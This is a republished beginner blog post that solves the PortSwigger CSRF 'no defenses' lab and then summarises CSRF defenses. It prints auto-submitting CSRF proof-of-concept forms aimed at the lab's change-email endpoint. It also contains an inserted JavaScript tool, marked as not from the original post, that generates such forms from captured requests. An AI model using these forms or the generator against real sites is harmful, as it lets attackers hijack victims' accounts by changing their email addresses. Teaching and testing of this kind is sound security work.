Unmasking Basic CSRF Bugs: Hunter Guide for Beginners
2023-6-5 10:40:36 Author: infosecwriteups.com (view original) Views: 22

Cross-site Request forgery

Vignesh

InfoSec Write-ups

Hey guys, welcome to my blog. Today we are going to discuss the CSRF vulnerability, which is usually rated medium or low severity, solve the basic PortSwigger CSRF lab, and finish with some common defenses against CSRF.

“Application security prioritizes impact over bug classification.”

https://evilox.medium.com/explanation-of-csrf-cross-site-request-forgery-bc6a5042bcbf

In the article above I discuss the basics of the CSRF vulnerability; read it first for a good understanding of the bug class. Now let's move on to the PortSwigger lab.

Hunting for CSRF

Alert: Before looking for this bug, check the out-of-scope list of the bug bounty program.

Lab: CSRF vulnerability with no defenses. In this lab there is no protection against CSRF at all.

  1. First, log in to (or sign up for) the application

You can log in to your account using the following credentials: wiener:peter

2. Look for a state-changing endpoint:

Examples: password change, email change, address change, deleting an account, sending a message.

These are only examples; choose any action whose forgery has a high impact on the user, because the severity of a CSRF finding follows the impact of the action.

In this lab there is an email-update endpoint on the account page that lets you change the account's email address.

3. Lack of CSRF protection: check for it with Burp Suite

First, enter any email address, capture the request in Burp, and look for a CSRF token in the request body or in a cookie.

A token in the body would look something like this: csrf_token = "e1f55fd7a4b0c8d7c32a3be95a38f6bc"

Also check the request headers for something like X-CSRF: e1f55fd7a4b0c8d7c32a3be95a38f6bc

In this lab's request there is no CSRF token in the body, cookies, or headers, so the session cookie alone authorizes the change. Finding no token at all is the simplest case; when a token is present you still have to test whether the server actually validates it, which is the subject of the next article.

4. Draft an HTML form to confirm the vulnerability

If you have Burp Suite Professional it is easy to generate the CSRF PoC; if you don't, there are alternatives.

  1. Burp Suite Professional Edition: right-click the captured request, then { Engagement tools -> Generate CSRF PoC }

Click Generate CSRF PoC and you will get the HTML form.

You can test it directly with the "Test in browser" option, or copy and paste it into a local file saved as CSRF.html, which is handier for re-use and for the report.

Open the file in a browser that still holds a logged-in session for the application and click "Submit request".

If the email address of the account changes, congratulations: you have found your first CSRF vulnerability in that application.

2. Alternative method if you don't have Burp Suite Professional

Use this website: https://csrf.infos3c.net/

Paste the request body into the site and it will generate the PoC for you. Use at your own risk: whatever you paste (including the session cookie, if you paste the whole request) is disclosed to that third-party site.

Or simply use the HTML form below.

<html>
<body>
<!-- rewrite the page's URL to / so the address bar and Referer do not show the PoC file name -->
<script>history.pushState('', '', '/')</script>
<!-- replace URL with the full URL of the state-changing endpoint -->
<form action="URL" method="POST">
<!-- one hidden input per parameter of the captured request -->
<input type="hidden" name="email" value="[email protected]" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

With this form you have to add the inputs by hand, which is why the website is more convenient for generating a PoC.

3. Solving this lab

To solve this lab there is an exploit server: go to it and paste the CSRF HTML form into the body.

<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://0a8800fd03f47b4580bab77.web-security-academy.net/my-account/change-email" method="POST">
<input type="hidden" name="email" value="[email protected]" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>

We have added a small piece of JavaScript:

<script>
document.forms[0].submit();
</script>

It submits the form automatically as soon as the page loads. This is not necessary for a bug bounty report, where you only need to show the change in the application, but it is what CTF-style labs and the exploit server need, because the simulated victim only visits the page and never clicks the button.
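The following is an added example, not code from the original post and not Burp's or csrf.infos3c.net's code: a small offline stand-in for the "Generate CSRF PoC" step. It parses a raw request captured in a proxy, performs the step-3 check for token-looking parameters, headers and cookies, and builds the step-4 HTML form with or without the auto-submit script. The sample request, the session cookie value and the email addresses are constructed for the demo; only the host name is the lab host quoted above.

```javascript
// Added example: offline CSRF PoC generator (not the post's or Burp's code).
// Constructed sample request: only the host is the lab host from the post.
const SAMPLE_REQUEST = [
  'POST /my-account/change-email HTTP/1.1',
  'Host: 0a8800fd03f47b4580bab77.web-security-academy.net',
  'Content-Type: application/x-www-form-urlencoded',
  'Cookie: session=constructed-session-cookie-value',
  'Content-Length: 30',
  '',
  'email=wiener%40normal-user.net',
].join('\r\n');

// Names that usually indicate an anti-CSRF token (heuristic, not exhaustive).
const TOKEN_NAME_RE = /csrf|xsrf|anti[-_]?forgery|requestverificationtoken|authenticity_token/i;

// Parse a raw HTTP/1.1 request (CRLF or LF line endings) into its parts.
function parseRawRequest(raw) {
  const [head, ...rest] = raw.split(/\r?\n\r?\n/);
  const lines = head.split(/\r?\n/);
  const [method, path] = lines[0].split(' ');
  const headers = {};
  for (const line of lines.slice(1)) {
    const i = line.indexOf(':');
    if (i > 0) headers[line.slice(0, i).trim().toLowerCase()] = line.slice(i + 1).trim();
  }
  const body = rest.join('\n\n').trim();
  const ctype = headers['content-type'] || '';
  // A plain <form> can only reproduce form-urlencoded (or multipart) bodies;
  // JSON endpoints need a different PoC and are out of scope here.
  if (ctype && !ctype.startsWith('application/x-www-form-urlencoded')) {
    throw new Error(`unsupported Content-Type for a form PoC: ${ctype}`);
  }
  return { method: method.toUpperCase(), path, headers, params: new URLSearchParams(body) };
}

// Step 3: report every token-looking body parameter, header or cookie.
// An empty list is the "no CSRF token" situation of this lab.
function findCsrfTokens(req) {
  const found = [];
  for (const [name] of req.params) if (TOKEN_NAME_RE.test(name)) found.push(`body:${name}`);
  for (const name of Object.keys(req.headers)) if (TOKEN_NAME_RE.test(name)) found.push(`header:${name}`);
  for (const part of (req.headers['cookie'] || '').split(';')) {
    const name = part.split('=')[0].trim();
    if (name && TOKEN_NAME_RE.test(name)) found.push(`cookie:${name}`);
  }
  return found;
}

function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, ch => map[ch]);
}

// Step 4: build the PoC. `overrides` swaps in attacker-chosen values (the new
// email); autoSubmit=true is the exploit-server/CTF variant, false leaves a
// "Submit request" button for a manual demonstration in a report.
function generateCsrfPoc(req, { overrides = {}, autoSubmit = true } = {}) {
  if (req.method !== 'POST') throw new Error(`only POST forms are generated, got ${req.method}`);
  if (!req.headers['host']) throw new Error('Host header missing, cannot build the action URL');
  const action = `https://${req.headers['host']}${req.path}`;
  const fields = [];
  for (const [name, value] of req.params) {
    const v = Object.prototype.hasOwnProperty.call(overrides, name) ? overrides[name] : value;
    fields.push(`    <input type="hidden" name="${escapeHtml(name)}" value="${escapeHtml(v)}" />`);
  }
  const lines = [
    '<html>',
    '  <body>',
    "    <script>history.pushState('', '', '/')</script>",
    `    <form action="${escapeHtml(action)}" method="POST">`,
    ...fields,
  ];
  if (autoSubmit) {
    lines.push('    </form>', '    <script>document.forms[0].submit();</script>');
  } else {
    lines.push('    <input type="submit" value="Submit request" />', '    </form>');
  }
  lines.push('  </body>', '</html>');
  return lines.join('\n');
}

// Demo: the lab request carries no token, so a PoC is generated.
const demoReq = parseRawRequest(SAMPLE_REQUEST);
console.log('tokens found:', findCsrfTokens(demoReq));
console.log(generateCsrfPoc(demoReq, { overrides: { email: 'pwned@evil.example' } }));
```

Paste the printed HTML into the exploit server body (auto-submit variant) or save it as CSRF.html and pass autoSubmit: false for the click-to-submit version used in a report. The Content-Type check is the caveat that matters in practice: if the endpoint only accepts JSON, this form-based PoC does not apply and the request needs a different approach.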

Beginner's tip: first note down all the state-changing requests, and test CSRF PoCs in Firefox rather than Chrome. Chrome treats cookies that have no SameSite attribute as Lax by default (see the defenses below), so it does not send the session cookie with a cross-site POST (except for cookies set within the last two minutes), and a PoC against an application with no protection at all can look like a false negative.

Common protection for CSRF

  • CSRF tokens — A CSRF token is a unique, secret, and unpredictable value that is generated by the server-side application and shared with the client. When attempting to perform a sensitive action, such as submitting a form, the client must include the correct CSRF token in the request. This makes it very difficult for an attacker to construct a valid request on behalf of the victim.
  • SameSite cookies — SameSite is a browser security mechanism that determines when a website’s cookies are included in requests originating from other websites. As requests to perform sensitive actions typically require an authenticated session cookie, the appropriate SameSite restrictions may prevent an attacker from triggering these actions cross-site. Since 2021, Chrome enforces Lax SameSite restrictions by default. As this is the proposed standard, we expect other major browsers to adopt this behavior in the future.
  • Referer-based validation — Some applications make use of the HTTP Referer header to attempt to defend against CSRF attacks, normally by verifying that the request originated from the application’s own domain. This is generally less effective than CSRF token validation: the check is commonly bypassed when the application skips it for requests that carry no Referer at all, or when it only checks that the expected domain appears somewhere in the header.

In the next article we will see how to bypass the protections above.

I hope this article was clear. If you liked it, give it some applause and follow me on Medium for more articles; if you have any doubts, don't hesitate to contact me.

Follow Me on Instagram: https://www.instagram.com/_._vicki__/

Linkedin: https://www.linkedin.com/in/vignesh-rajeshkannan/


Source: https://infosecwriteups.com/unmasking-basic-csrf-bug-hunter-5003dbe44466?source=rss----7b722bfd1b8d--bug_bounty